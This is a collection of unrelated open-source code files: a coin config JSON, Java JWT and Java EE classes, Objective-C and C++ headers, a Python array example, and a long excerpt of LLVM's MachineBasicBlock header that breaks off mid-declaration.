686 | <filename>config/coins/elephantcoin.json
{
"name": "Elephantcoin",
"symbol": "ELP",
"algorithm": "scrypt",
"site": "http://elephantcoin.wordpress.com/",
"blockExplorer": {
"block": "http://www.exploretheblocks.com/elephantcoin/block_crawler.php?block_hash=",
"tx": "http://www.exploretheblocks.com/elephantcoin/block_crawler.php?transaction="
}
} | 162 |
4,950 | package com.auth0.jwt.impl;
import com.auth0.jwt.exceptions.JWTDecodeException;
import com.auth0.jwt.interfaces.Header;
import com.auth0.jwt.interfaces.JWTPartsParser;
import com.auth0.jwt.interfaces.Payload;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.ObjectReader;
import com.fasterxml.jackson.databind.SerializationFeature;
import com.fasterxml.jackson.databind.module.SimpleModule;
import java.io.IOException;
public class JWTParser implements JWTPartsParser {
private final ObjectReader payloadReader;
private final ObjectReader headerReader;
public JWTParser() {
this(getDefaultObjectMapper());
}
JWTParser(ObjectMapper mapper) {
addDeserializers(mapper);
this.payloadReader = mapper.readerFor(Payload.class);
this.headerReader = mapper.readerFor(Header.class);
}
@Override
public Payload parsePayload(String json) throws JWTDecodeException {
if (json == null) {
throw decodeException();
}
try {
return payloadReader.readValue(json);
} catch (IOException e) {
throw decodeException(json);
}
}
@Override
public Header parseHeader(String json) throws JWTDecodeException {
if (json == null) {
throw decodeException();
}
try {
return headerReader.readValue(json);
} catch (IOException e) {
throw decodeException(json);
}
}
private void addDeserializers(ObjectMapper mapper) {
SimpleModule module = new SimpleModule();
ObjectReader reader = mapper.reader();
module.addDeserializer(Payload.class, new PayloadDeserializer(reader));
module.addDeserializer(Header.class, new HeaderDeserializer(reader));
mapper.registerModule(module);
}
static ObjectMapper getDefaultObjectMapper() {
ObjectMapper mapper = new ObjectMapper();
mapper.disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);
mapper.setSerializationInclusion(JsonInclude.Include.NON_EMPTY);
return mapper;
}
private static JWTDecodeException decodeException() {
return decodeException(null);
}
private static JWTDecodeException decodeException(String json) {
return new JWTDecodeException(String.format("The string '%s' doesn't have a valid JSON format.", json));
}
}
| 964 |
505 | <filename>application-server-cheatsheet/src/main/java/sample/SampleResource.java
package sample;
import java.sql.Connection;
import java.sql.SQLException;
import javax.annotation.Resource;
import javax.persistence.EntityManager;
import javax.persistence.PersistenceContext;
import javax.sql.DataSource;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.core.Response;
@Path("sample")
public class SampleResource {
private String message = "Hello World!";
@PersistenceContext
private EntityManager em;
@Resource(lookup = "jdbc/postgres")
// @Resource(name = "jdbc/postgres") for Tomee
// @Resource(lookup = "java:jboss/datasources/postgres") for WildFly
private DataSource dataSource;
@GET
public Response message() throws SQLException {
String databaseName = "";
try (Connection con = dataSource.getConnection()) {
databaseName = con.getMetaData().getDatabaseProductName();
}
return Response.ok(message + " with database: " + databaseName).build();
}
}
| 371 |
8,805 | <filename>osx/KBKit/KBKit/UI/Folders/KBUserPermission.h
//
// KBUserPermission.h
// Keybase
//
// Created by Gabriel on 4/30/15.
// Copyright (c) 2015 <NAME>. All rights reserved.
//
#import <Foundation/Foundation.h>
#import "KBRPC.h"
@interface KBUserPermission : NSObject
@property KBRUser *user;
@property NSString *permission;
@end
| 131 |
432 | package us.parr.bookish.model.ref;
import us.parr.bookish.entity.EntityDef;
public class CitationRef extends EntityRef {
public CitationRef(EntityDef def) {
super(def);
}
}
| 63 |
746 | package org.protege.editor.core.util;
/**
* <NAME>
* Stanford Center for Biomedical Informatics Research
* 2 Jun 16
*/
public class StringAbbreviator {
public static final String ELLIPSIS = "\u2026";
/**
* Abbreviates the specified string to the specified length
* @param s The String to be abbreviated. Not {@code null}.
* @param length The maximum length. The original string will be truncated to this length.
* @return The abbreviated string that is a length less than or equal the specified length. If the specified length
* is less than the original string length then a trailing ellipsis will be added.
*/
public static String abbreviateString(String s, int length) {
if(s == null) {
return null;
}
if(s.isEmpty()) {
return s;
}
if(length <= 0) {
return ELLIPSIS;
}
// Finish at either the length or the specified length
int endIndex = Math.min(s.length(), length);
String truncatedString = s.substring(0, endIndex);
if(truncatedString.length() < s.length()) {
return truncatedString + ELLIPSIS;
}
else {
return truncatedString;
}
}
}
| 495 |
1,489 | package me.ele.amigo.compat;
import java.lang.reflect.InvocationTargetException;
import me.ele.amigo.reflect.MethodUtils;
public class ActivityManagerNativeCompat {
private static Class sClass;
public static Class Class() throws ClassNotFoundException {
if (sClass == null) {
sClass = Class.forName("android.app.ActivityManagerNative");
}
return sClass;
}
public static Object getDefault() throws ClassNotFoundException, NoSuchMethodException,
IllegalAccessException, InvocationTargetException {
return MethodUtils.invokeStaticMethod(Class(), "getDefault");
}
}
| 218 |
1,119 | package com.macro.mall.tiny.security.annotation;
import java.lang.annotation.*;
/**
* 自定义注解,有该注解的缓存方法会抛出异常
*/
@Documented
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
public @interface CacheException {
}
| 114 |
2,468 | # -*- coding: utf-8 -*-
# https://docs.python.org/2/library/array.html
from array import array # python 提供的比较原始的 array 类
arr = array('u', 'asdf')
print(arr[0], arr[1], arr[2], arr[3])
# 实现定长的 Array ADT,省略了边界检查等
class Array(object):
def __init__(self, size=32):
self._size = size
self._items = [None] * size
def __getitem__(self, index):
return self._items[index]
def __setitem__(self, index, value):
self._items[index] = value
def __len__(self):
return self._size
def clear(self, value=None):
for i in range(len(self._items)):
self._items[i] = value
def __iter__(self):
for item in self._items:
yield item
def test_array():
size = 10
a = Array(size)
a[0] = 1
assert a[0] == 1
assert len(a) == 10
# py.test array_and_list.py
| 434 |
1,861 | // Copyright (c) Facebook, Inc. and its affiliates.
//
// This source code is licensed under the MIT license found in the
// LICENSE file in the root directory of this source tree.
#define FSPObjectEqualObject(lhs, rhs) (lhs == rhs || (lhs != nil && [lhs isEqual:rhs]))
#include <folly/FixedString.h>
NS_INLINE NSString *FSPStringFromInternalFixedString(const folly::FixedString<10> &fixedString)
{
return [NSString stringWithUTF8String:fixedString.cbegin()];
}
NS_INLINE folly::FixedString<10> FSPInternalFixedStringFromString(NSString *const string)
{
return folly::FixedString<10>{string.UTF8String, string.length};
}
| 202 |
938 | //===- llvm/CodeGen/MachineBasicBlock.h -------------------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// Collect the sequence of machine instructions for a basic block.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CODEGEN_MACHINEBASICBLOCK_H
#define LLVM_CODEGEN_MACHINEBASICBLOCK_H
#include "llvm/ADT/GraphTraits.h"
#include "llvm/ADT/ilist.h"
#include "llvm/ADT/ilist_node.h"
#include "llvm/ADT/iterator_range.h"
#include "llvm/ADT/simple_ilist.h"
#include "llvm/CodeGen/MachineInstr.h"
#include "llvm/CodeGen/MachineInstrBundleIterator.h"
#include "llvm/IR/DebugLoc.h"
#include "llvm/MC/LaneBitmask.h"
#include "llvm/MC/MCRegisterInfo.h"
#include "llvm/Support/BranchProbability.h"
#include "llvm/Support/Printable.h"
#include <cassert>
#include <cstdint>
#include <functional>
#include <iterator>
#include <string>
#include <vector>
namespace llvm {
class BasicBlock;
class MachineFunction;
class MCSymbol;
class ModuleSlotTracker;
class Pass;
class SlotIndexes;
class StringRef;
class raw_ostream;
class TargetRegisterClass;
class TargetRegisterInfo;
template <> struct ilist_traits<MachineInstr> {
private:
friend class MachineBasicBlock; // Set by the owning MachineBasicBlock.
MachineBasicBlock *Parent;
using instr_iterator =
simple_ilist<MachineInstr, ilist_sentinel_tracking<true>>::iterator;
public:
void addNodeToList(MachineInstr *N);
void removeNodeFromList(MachineInstr *N);
void transferNodesFromList(ilist_traits &FromList, instr_iterator First,
instr_iterator Last);
void deleteNode(MachineInstr *MI);
};
class MachineBasicBlock
: public ilist_node_with_parent<MachineBasicBlock, MachineFunction> {
public:
/// Pair of physical register and lane mask.
/// This is not simply a std::pair typedef because the members should be named
/// clearly as they both have an integer type.
struct RegisterMaskPair {
public:
MCPhysReg PhysReg;
LaneBitmask LaneMask;
RegisterMaskPair(MCPhysReg PhysReg, LaneBitmask LaneMask)
: PhysReg(PhysReg), LaneMask(LaneMask) {}
};
private:
using Instructions = ilist<MachineInstr, ilist_sentinel_tracking<true>>;
Instructions Insts;
const BasicBlock *BB;
int Number;
MachineFunction *xParent;
/// Keep track of the predecessor / successor basic blocks.
std::vector<MachineBasicBlock *> Predecessors;
std::vector<MachineBasicBlock *> Successors;
/// Keep track of the probabilities to the successors. This vector has the
/// same order as Successors, or it is empty if we don't use it (disable
/// optimization).
std::vector<BranchProbability> Probs;
using probability_iterator = std::vector<BranchProbability>::iterator;
using const_probability_iterator =
std::vector<BranchProbability>::const_iterator;
Optional<uint64_t> IrrLoopHeaderWeight;
/// Keep track of the physical registers that are livein of the basicblock.
using LiveInVector = std::vector<RegisterMaskPair>;
LiveInVector LiveIns;
/// Alignment of the basic block. Zero if the basic block does not need to be
/// aligned. The alignment is specified as log2(bytes).
unsigned Alignment = 0;
/// Indicate that this basic block is entered via an exception handler.
bool IsEHPad = false;
/// Indicate that this basic block is potentially the target of an indirect
/// branch.
bool AddressTaken = false;
/// Indicate that this basic block needs its symbol be emitted regardless of
/// whether the flow just falls-through to it.
bool LabelMustBeEmitted = false;
/// Indicate that this basic block is the entry block of an EH scope, i.e.,
/// the block that used to have a catchpad or cleanuppad instruction in the
/// LLVM IR.
bool IsEHScopeEntry = false;
/// Indicate that this basic block is the entry block of an EH funclet.
bool IsEHFuncletEntry = false;
/// Indicate that this basic block is the entry block of a cleanup funclet.
bool IsCleanupFuncletEntry = false;
/// since getSymbol is a relatively heavy-weight operation, the symbol
/// is only computed once and is cached.
mutable MCSymbol *CachedMCSymbol = nullptr;
// Intrusive list support
MachineBasicBlock() = default;
explicit MachineBasicBlock(MachineFunction &MF, const BasicBlock *BB);
~MachineBasicBlock();
// MachineBasicBlocks are allocated and owned by MachineFunction.
friend class MachineFunction;
public:
/// Return the LLVM basic block that this instance corresponded to originally.
/// Note that this may be NULL if this instance does not correspond directly
/// to an LLVM basic block.
const BasicBlock *getBasicBlock() const { return BB; }
/// Return the name of the corresponding LLVM basic block, or an empty string.
StringRef getName() const;
/// Return a formatted string to identify this block and its parent function.
std::string getFullName() const;
/// Test whether this block is potentially the target of an indirect branch.
bool hasAddressTaken() const { return AddressTaken; }
/// Set this block to reflect that it potentially is the target of an indirect
/// branch.
void setHasAddressTaken() { AddressTaken = true; }
/// Test whether this block must have its label emitted.
bool hasLabelMustBeEmitted() const { return LabelMustBeEmitted; }
/// Set this block to reflect that, regardless how we flow to it, we need
/// its label be emitted.
void setLabelMustBeEmitted() { LabelMustBeEmitted = true; }
/// Return the MachineFunction containing this basic block.
const MachineFunction *getParent() const { return xParent; }
MachineFunction *getParent() { return xParent; }
using instr_iterator = Instructions::iterator;
using const_instr_iterator = Instructions::const_iterator;
using reverse_instr_iterator = Instructions::reverse_iterator;
using const_reverse_instr_iterator = Instructions::const_reverse_iterator;
using iterator = MachineInstrBundleIterator<MachineInstr>;
using const_iterator = MachineInstrBundleIterator<const MachineInstr>;
using reverse_iterator = MachineInstrBundleIterator<MachineInstr, true>;
using const_reverse_iterator =
MachineInstrBundleIterator<const MachineInstr, true>;
unsigned size() const { return (unsigned)Insts.size(); }
bool empty() const { return Insts.empty(); }
MachineInstr &instr_front() { return Insts.front(); }
MachineInstr &instr_back() { return Insts.back(); }
const MachineInstr &instr_front() const { return Insts.front(); }
const MachineInstr &instr_back() const { return Insts.back(); }
MachineInstr &front() { return Insts.front(); }
MachineInstr &back() { return *--end(); }
const MachineInstr &front() const { return Insts.front(); }
const MachineInstr &back() const { return *--end(); }
instr_iterator instr_begin() { return Insts.begin(); }
const_instr_iterator instr_begin() const { return Insts.begin(); }
instr_iterator instr_end() { return Insts.end(); }
const_instr_iterator instr_end() const { return Insts.end(); }
reverse_instr_iterator instr_rbegin() { return Insts.rbegin(); }
const_reverse_instr_iterator instr_rbegin() const { return Insts.rbegin(); }
reverse_instr_iterator instr_rend () { return Insts.rend(); }
const_reverse_instr_iterator instr_rend () const { return Insts.rend(); }
using instr_range = iterator_range<instr_iterator>;
using const_instr_range = iterator_range<const_instr_iterator>;
instr_range instrs() { return instr_range(instr_begin(), instr_end()); }
const_instr_range instrs() const {
return const_instr_range(instr_begin(), instr_end());
}
iterator begin() { return instr_begin(); }
const_iterator begin() const { return instr_begin(); }
iterator end () { return instr_end(); }
const_iterator end () const { return instr_end(); }
reverse_iterator rbegin() {
return reverse_iterator::getAtBundleBegin(instr_rbegin());
}
const_reverse_iterator rbegin() const {
return const_reverse_iterator::getAtBundleBegin(instr_rbegin());
}
reverse_iterator rend() { return reverse_iterator(instr_rend()); }
const_reverse_iterator rend() const {
return const_reverse_iterator(instr_rend());
}
/// Support for MachineInstr::getNextNode().
static Instructions MachineBasicBlock::*getSublistAccess(MachineInstr *) {
return &MachineBasicBlock::Insts;
}
inline iterator_range<iterator> terminators() {
return make_range(getFirstTerminator(), end());
}
inline iterator_range<const_iterator> terminators() const {
return make_range(getFirstTerminator(), end());
}
/// Returns a range that iterates over the phis in the basic block.
inline iterator_range<iterator> phis() {
return make_range(begin(), getFirstNonPHI());
}
inline iterator_range<const_iterator> phis() const {
return const_cast<MachineBasicBlock *>(this)->phis();
}
// Machine-CFG iterators
using pred_iterator = std::vector<MachineBasicBlock *>::iterator;
using const_pred_iterator = std::vector<MachineBasicBlock *>::const_iterator;
using succ_iterator = std::vector<MachineBasicBlock *>::iterator;
using const_succ_iterator = std::vector<MachineBasicBlock *>::const_iterator;
using pred_reverse_iterator =
std::vector<MachineBasicBlock *>::reverse_iterator;
using const_pred_reverse_iterator =
std::vector<MachineBasicBlock *>::const_reverse_iterator;
using succ_reverse_iterator =
std::vector<MachineBasicBlock *>::reverse_iterator;
using const_succ_reverse_iterator =
std::vector<MachineBasicBlock *>::const_reverse_iterator;
pred_iterator pred_begin() { return Predecessors.begin(); }
const_pred_iterator pred_begin() const { return Predecessors.begin(); }
pred_iterator pred_end() { return Predecessors.end(); }
const_pred_iterator pred_end() const { return Predecessors.end(); }
pred_reverse_iterator pred_rbegin()
{ return Predecessors.rbegin();}
const_pred_reverse_iterator pred_rbegin() const
{ return Predecessors.rbegin();}
pred_reverse_iterator pred_rend()
{ return Predecessors.rend(); }
const_pred_reverse_iterator pred_rend() const
{ return Predecessors.rend(); }
unsigned pred_size() const {
return (unsigned)Predecessors.size();
}
bool pred_empty() const { return Predecessors.empty(); }
succ_iterator succ_begin() { return Successors.begin(); }
const_succ_iterator succ_begin() const { return Successors.begin(); }
succ_iterator succ_end() { return Successors.end(); }
const_succ_iterator succ_end() const { return Successors.end(); }
succ_reverse_iterator succ_rbegin()
{ return Successors.rbegin(); }
const_succ_reverse_iterator succ_rbegin() const
{ return Successors.rbegin(); }
succ_reverse_iterator succ_rend()
{ return Successors.rend(); }
const_succ_reverse_iterator succ_rend() const
{ return Successors.rend(); }
unsigned succ_size() const {
return (unsigned)Successors.size();
}
bool succ_empty() const { return Successors.empty(); }
inline iterator_range<pred_iterator> predecessors() {
return make_range(pred_begin(), pred_end());
}
inline iterator_range<const_pred_iterator> predecessors() const {
return make_range(pred_begin(), pred_end());
}
inline iterator_range<succ_iterator> successors() {
return make_range(succ_begin(), succ_end());
}
inline iterator_range<const_succ_iterator> successors() const {
return make_range(succ_begin(), succ_end());
}
// LiveIn management methods.
/// Adds the specified register as a live in. Note that it is an error to add
/// the same register to the same set more than once unless the intention is
/// to call sortUniqueLiveIns after all registers are added.
void addLiveIn(MCPhysReg PhysReg,
LaneBitmask LaneMask = LaneBitmask::getAll()) {
LiveIns.push_back(RegisterMaskPair(PhysReg, LaneMask));
}
void addLiveIn(const RegisterMaskPair &RegMaskPair) {
LiveIns.push_back(RegMaskPair);
}
/// Sorts and uniques the LiveIns vector. It can be significantly faster to do
/// this than repeatedly calling isLiveIn before calling addLiveIn for every
/// LiveIn insertion.
void sortUniqueLiveIns();
/// Clear live in list.
void clearLiveIns();
/// Add PhysReg as live in to this block, and ensure that there is a copy of
/// PhysReg to a virtual register of class RC. Return the virtual register
/// that is a copy of the live in PhysReg.
unsigned addLiveIn(MCPhysReg PhysReg, const TargetRegisterClass *RC);
/// Remove the specified register from the live in set.
void removeLiveIn(MCPhysReg Reg,
LaneBitmask LaneMask = LaneBitmask::getAll());
/// Return true if the specified register is in the live in set.
bool isLiveIn(MCPhysReg Reg,
LaneBitmask LaneMask = LaneBitmask::getAll()) const;
// Iteration support for live in sets. These sets are kept in sorted
// order by their register number.
using livein_iterator = LiveInVector::const_iterator;
#ifndef NDEBUG
/// Unlike livein_begin, this method does not check that the liveness
/// information is accurate. Still for debug purposes it may be useful
/// to have iterators that won't assert if the liveness information
/// is not current.
livein_iterator livein_begin_dbg() const { return LiveIns.begin(); }
iterator_range<livein_iterator> liveins_dbg() const {
return make_range(livein_begin_dbg(), livein_end());
}
#endif
livein_iterator livein_begin() const;
livein_iterator livein_end() const { return LiveIns.end(); }
bool livein_empty() const { return LiveIns.empty(); }
iterator_range<livein_iterator> liveins() const {
return make_range(livein_begin(), livein_end());
}
/// Remove entry from the livein set and return iterator to the next.
livein_iterator removeLiveIn(livein_iterator I);
/// Get the clobber mask for the start of this basic block. Funclets use this
/// to prevent register allocation across funclet transitions.
const uint32_t *getBeginClobberMask(const TargetRegisterInfo *TRI) const;
/// Get the clobber mask for the end of the basic block.
/// \see getBeginClobberMask()
const uint32_t *getEndClobberMask(const TargetRegisterInfo *TRI) const;
/// Return alignment of the basic block. The alignment is specified as
/// log2(bytes).
unsigned getAlignment() const { return Alignment; }
/// Set alignment of the basic block. The alignment is specified as
/// log2(bytes).
void setAlignment(unsigned Align) { Alignment = Align; }
/// Returns true if the block is a landing pad. That is this basic block is
/// entered via an exception handler.
bool isEHPad() const { return IsEHPad; }
/// Indicates the block is a landing pad. That is this basic block is entered
/// via an exception handler.
void setIsEHPad(bool V = true) { IsEHPad = V; }
bool hasEHPadSuccessor() const;
/// Returns true if this is the entry block of an EH scope, i.e., the block
/// that used to have a catchpad or cleanuppad instruction in the LLVM IR.
bool isEHScopeEntry() const { return IsEHScopeEntry; }
/// Indicates if this is the entry block of an EH scope, i.e., the block that
/// that used to have a catchpad or cleanuppad instruction in the LLVM IR.
void setIsEHScopeEntry(bool V = true) { IsEHScopeEntry = V; }
/// Returns true if this is the entry block of an EH funclet.
bool isEHFuncletEntry() const { return IsEHFuncletEntry; }
/// Indicates if this is the entry block of an EH funclet.
void setIsEHFuncletEntry(bool V = true) { IsEHFuncletEntry = V; }
/// Returns true if this is the entry block of a cleanup funclet.
bool isCleanupFuncletEntry() const { return IsCleanupFuncletEntry; }
/// Indicates if this is the entry block of a cleanup funclet.
void setIsCleanupFuncletEntry(bool V = true) { IsCleanupFuncletEntry = V; }
/// Returns true if it is legal to hoist instructions into this block.
bool isLegalToHoistInto() const;
// Code Layout methods.
/// Move 'this' block before or after the specified block. This only moves
/// the block, it does not modify the CFG or adjust potential fall-throughs at
/// the end of the block.
void moveBefore(MachineBasicBlock *NewAfter);
void moveAfter(MachineBasicBlock *NewBefore);
/// Update the terminator instructions in block to account for changes to the
/// layout. If the block previously used a fallthrough, it may now need a
/// branch, and if it previously used branching it may now be able to use a
/// fallthrough.
void updateTerminator();
// Machine-CFG mutators
/// Add Succ as a successor of this MachineBasicBlock. The Predecessors list
/// of Succ is automatically updated. PROB parameter is stored in
/// Probabilities list. The default probability is set as unknown. Mixing
/// known and unknown probabilities in successor list is not allowed. When all
/// successors have unknown probabilities, 1 / N is returned as the
/// probability for each successor, where N is the number of successors.
///
/// Note that duplicate Machine CFG edges are not allowed.
void addSuccessor(MachineBasicBlock *Succ,
BranchProbability Prob = BranchProbability::getUnknown());
/// Add Succ as a successor of this MachineBasicBlock. The Predecessors list
/// of Succ is automatically updated. The probability is not provided because
/// BPI is not available (e.g. -O0 is used), in which case edge probabilities
/// won't be used. Using this interface can save some space.
void addSuccessorWithoutProb(MachineBasicBlock *Succ);
/// Set successor probability of a given iterator.
void setSuccProbability(succ_iterator I, BranchProbability Prob);
/// Normalize probabilities of all successors so that the sum of them becomes
/// one. This is usually done when the current update on this MBB is done, and
/// the sum of its successors' probabilities is not guaranteed to be one. The
/// user is responsible for the correct use of this function.
/// MBB::removeSuccessor() has an option to do this automatically.
void normalizeSuccProbs() {
BranchProbability::normalizeProbabilities(Probs.begin(), Probs.end());
}
/// Validate successors' probabilities and check if the sum of them is
/// approximate one. This only works in DEBUG mode.
void validateSuccProbs() const;
/// Remove successor from the successors list of this MachineBasicBlock. The
/// Predecessors list of Succ is automatically updated.
/// If NormalizeSuccProbs is true, then normalize successors' probabilities
/// after the successor is removed.
void removeSuccessor(MachineBasicBlock *Succ,
bool NormalizeSuccProbs = false);
/// Remove specified successor from the successors list of this
/// MachineBasicBlock. The Predecessors list of Succ is automatically updated.
/// If NormalizeSuccProbs is true, then normalize successors' probabilities
/// after the successor is removed.
/// Return the iterator to the element after the one removed.
succ_iterator removeSuccessor(succ_iterator I,
bool NormalizeSuccProbs = false);
/// Replace successor OLD with NEW and update probability info.
void replaceSuccessor(MachineBasicBlock *Old, MachineBasicBlock *New);
/// Copy a successor (and any probability info) from original block to this
/// block's. Uses an iterator into the original blocks successors.
///
/// This is useful when doing a partial clone of successors. Afterward, the
/// probabilities may need to be normalized.
void copySuccessor(MachineBasicBlock *Orig, succ_iterator I);
/// Split the old successor into old plus new and updates the probability
/// info.
void splitSuccessor(MachineBasicBlock *Old, MachineBasicBlock *New,
bool NormalizeSuccProbs = false);
/// Transfers all the successors from MBB to this machine basic block (i.e.,
/// copies all the successors FromMBB and remove all the successors from
/// FromMBB).
void transferSuccessors(MachineBasicBlock *FromMBB);
/// Transfers all the successors, as in transferSuccessors, and update PHI
/// operands in the successor blocks which refer to FromMBB to refer to this.
void transferSuccessorsAndUpdatePHIs(MachineBasicBlock *FromMBB);
/// Return true if any of the successors have probabilities attached to them.
bool hasSuccessorProbabilities() const { return !Probs.empty(); }
/// Return true if the specified MBB is a predecessor of this block.
bool isPredecessor(const MachineBasicBlock *MBB) const;
/// Return true if the specified MBB is a successor of this block.
bool isSuccessor(const MachineBasicBlock *MBB) const;
/// Return true if the specified MBB will be emitted immediately after this
/// block, such that if this block exits by falling through, control will
/// transfer to the specified MBB. Note that MBB need not be a successor at
/// all, for example if this block ends with an unconditional branch to some
/// other block.
bool isLayoutSuccessor(const MachineBasicBlock *MBB) const;
/// Return the fallthrough block if the block can implicitly
/// transfer control to the block after it by falling off the end of
/// it. This should return null if it can reach the block after
/// it, but it uses an explicit branch to do so (e.g., a table
/// jump). Non-null return is a conservative answer.
MachineBasicBlock *getFallThrough();
/// Return true if the block can implicitly transfer control to the
/// block after it by falling off the end of it. This should return
/// false if it can reach the block after it, but it uses an
/// explicit branch to do so (e.g., a table jump). True is a
/// conservative answer.
bool canFallThrough();
/// Returns a pointer to the first instruction in this block that is not a
/// PHINode instruction. When adding instructions to the beginning of the
/// basic block, they should be added before the returned value, not before
/// the first instruction, which might be PHI.
/// Returns end() is there's no non-PHI instruction.
iterator getFirstNonPHI();
/// Return the first instruction in MBB after I that is not a PHI or a label.
/// This is the correct point to insert lowered copies at the beginning of a
/// basic block that must be before any debugging information.
iterator SkipPHIsAndLabels(iterator I);
/// Return the first instruction in MBB after I that is not a PHI, label or
/// debug. This is the correct point to insert copies at the beginning of a
/// basic block.
iterator SkipPHIsLabelsAndDebug(iterator I);
/// Returns an iterator to the first terminator instruction of this basic
/// block. If a terminator does not exist, it returns end().
iterator getFirstTerminator();
const_iterator getFirstTerminator() const {
return const_cast<MachineBasicBlock *>(this)->getFirstTerminator();
}
/// Same getFirstTerminator but it ignores bundles and return an
/// instr_iterator instead.
instr_iterator getFirstInstrTerminator();
/// Returns an iterator to the first non-debug instruction in the basic block,
/// or end().
iterator getFirstNonDebugInstr();
const_iterator getFirstNonDebugInstr() const {
return const_cast<MachineBasicBlock *>(this)->getFirstNonDebugInstr();
}
/// Returns an iterator to the last non-debug instruction in the basic block,
/// or end().
iterator getLastNonDebugInstr();
const_iterator getLastNonDebugInstr() const {
return const_cast<MachineBasicBlock *>(this)->getLastNonDebugInstr();
}
/// Convenience function that returns true if the block ends in a return
/// instruction.
bool isReturnBlock() const {
return !empty() && back().isReturn();
}
/// Convenience function that returns true if the bock ends in a EH scope
/// return instruction.
bool isEHScopeReturnBlock() const {
return !empty() && back().isEHScopeReturn();
}
/// Split the critical edge from this block to the given successor block, and
/// return the newly created block, or null if splitting is not possible.
///
/// This function updates LiveVariables, MachineDominatorTree, and
/// MachineLoopInfo, as applicable.
MachineBasicBlock *SplitCriticalEdge(MachineBasicBlock *Succ, Pass &P);
/// Check if the edge between this block and the given successor \p
/// Succ, can be split. If this returns true a subsequent call to
/// SplitCriticalEdge is guaranteed to return a valid basic block if
/// no changes occurred in the meantime.
bool canSplitCriticalEdge(const MachineBasicBlock *Succ) const;
void pop_front() { Insts.pop_front(); }
void pop_back() { Insts.pop_back(); }
void push_back(MachineInstr *MI) { Insts.push_back(MI); }
/// Insert MI into the instruction list before I, possibly inside a bundle.
///
/// If the insertion point is inside a bundle, MI will be added to the bundle,
/// otherwise MI will not be added to any bundle. That means this function
/// alone can't be used to prepend or append instructions to bundles. See
/// MIBundleBuilder::insert() for a more reliable way of doing that.
instr_iterator insert(instr_iterator I, MachineInstr *M);
/// Insert a range of instructions into the instruction list before I.
template<typename IT>
void insert(iterator I, IT S, IT E) {
assert((I == end() || I->getParent() == this) &&
"iterator points outside of basic block");
Insts.insert(I.getInstrIterator(), S, E);
}
/// Insert MI into the instruction list before I.
iterator insert(iterator I, MachineInstr *MI) {
assert((I == end() || I->getParent() == this) &&
"iterator points outside of basic block");
assert(!MI->isBundledWithPred() && !MI->isBundledWithSucc() &&
"Cannot insert instruction with bundle flags");
return Insts.insert(I.getInstrIterator(), MI);
}
/// Insert MI into the instruction list after I.
iterator insertAfter(iterator I, MachineInstr *MI) {
assert((I == end() || I->getParent() == this) &&
"iterator points outside of basic block");
assert(!MI->isBundledWithPred() && !MI->isBundledWithSucc() &&
"Cannot insert instruction with bundle flags");
return Insts.insertAfter(I.getInstrIterator(), MI);
}
/// Remove an instruction from the instruction list and delete it.
///
/// If the instruction is part of a bundle, the other instructions in the
/// bundle will still be bundled after removing the single instruction.
instr_iterator erase(instr_iterator I);
/// Remove an instruction from the instruction list and delete it.
///
/// If the instruction is part of a bundle, the other instructions in the
/// bundle will still be bundled after removing the single instruction.
instr_iterator erase_instr(MachineInstr *I) {
return erase(instr_iterator(I));
}
/// Remove a range of instructions from the instruction list and delete them.
iterator erase(iterator I, iterator E) {
return Insts.erase(I.getInstrIterator(), E.getInstrIterator());
}
/// Remove an instruction or bundle from the instruction list and delete it.
///
/// If I points to a bundle of instructions, they are all erased.
iterator erase(iterator I) {
return erase(I, std::next(I));
}
/// Remove an instruction from the instruction list and delete it.
///
/// If I is the head of a bundle of instructions, the whole bundle will be
/// erased.
iterator erase(MachineInstr *I) {
return erase(iterator(I));
}
/// Remove the unbundled instruction from the instruction list without
/// deleting it.
///
/// This function can not be used to remove bundled instructions, use
/// remove_instr to remove individual instructions from a bundle.
MachineInstr *remove(MachineInstr *I) {
assert(!I->isBundled() && "Cannot remove bundled instructions");
return Insts.remove(instr_iterator(I));
}
/// Remove the possibly bundled instruction from the instruction list
/// without deleting it.
///
/// If the instruction is part of a bundle, the other instructions in the
/// bundle will still be bundled after removing the single instruction.
MachineInstr *remove_instr(MachineInstr *I);
void clear() {
Insts.clear();
}
/// Take an instruction from MBB 'Other' at the position From, and insert it
/// into this MBB right before 'Where'.
///
/// If From points to a bundle of instructions, the whole bundle is moved.
void splice(iterator Where, MachineBasicBlock *Other, iterator From) {
// The range splice() doesn't allow noop moves, but this one does.
if (Where != From)
splice(Where, Other, From, std::next(From));
}
/// Take a block of instructions from MBB 'Other' in the range [From, To),
/// and insert them into this MBB right before 'Where'.
///
/// The instruction at 'Where' must not be included in the range of
/// instructions to move.
void splice(iterator Where, MachineBasicBlock *Other,
iterator From, iterator To) {
Insts.splice(Where.getInstrIterator(), Other->Insts,
From.getInstrIterator(), To.getInstrIterator());
}
/// This method unlinks 'this' from the containing function, and returns it,
/// but does not delete it.
MachineBasicBlock *removeFromParent();
/// This method unlinks 'this' from the containing function and deletes it.
void eraseFromParent();
/// Given a machine basic block that branched to 'Old', change the code and
/// CFG so that it branches to 'New' instead.
void ReplaceUsesOfBlockWith(MachineBasicBlock *Old, MachineBasicBlock *New);
/// Various pieces of code can cause excess edges in the CFG to be inserted.
/// If we have proven that MBB can only branch to DestA and DestB, remove any
/// other MBB successors from the CFG. DestA and DestB can be null. Besides
/// DestA and DestB, retain other edges leading to LandingPads (currently
/// there can be only one; we don't check or require that here). Note it is
/// possible that DestA and/or DestB are LandingPads.
bool CorrectExtraCFGEdges(MachineBasicBlock *DestA,
MachineBasicBlock *DestB,
bool IsCond);
/// Find the next valid DebugLoc starting at MBBI, skipping any DBG_VALUE
/// and DBG_LABEL instructions. Return UnknownLoc if there is none.
DebugLoc findDebugLoc(instr_iterator MBBI);
DebugLoc findDebugLoc(iterator MBBI) {
return findDebugLoc(MBBI.getInstrIterator());
}
/// Find the previous valid DebugLoc preceding MBBI, skipping and DBG_VALUE
/// instructions. Return UnknownLoc if there is none.
DebugLoc findPrevDebugLoc(instr_iterator MBBI);
DebugLoc findPrevDebugLoc(iterator MBBI) {
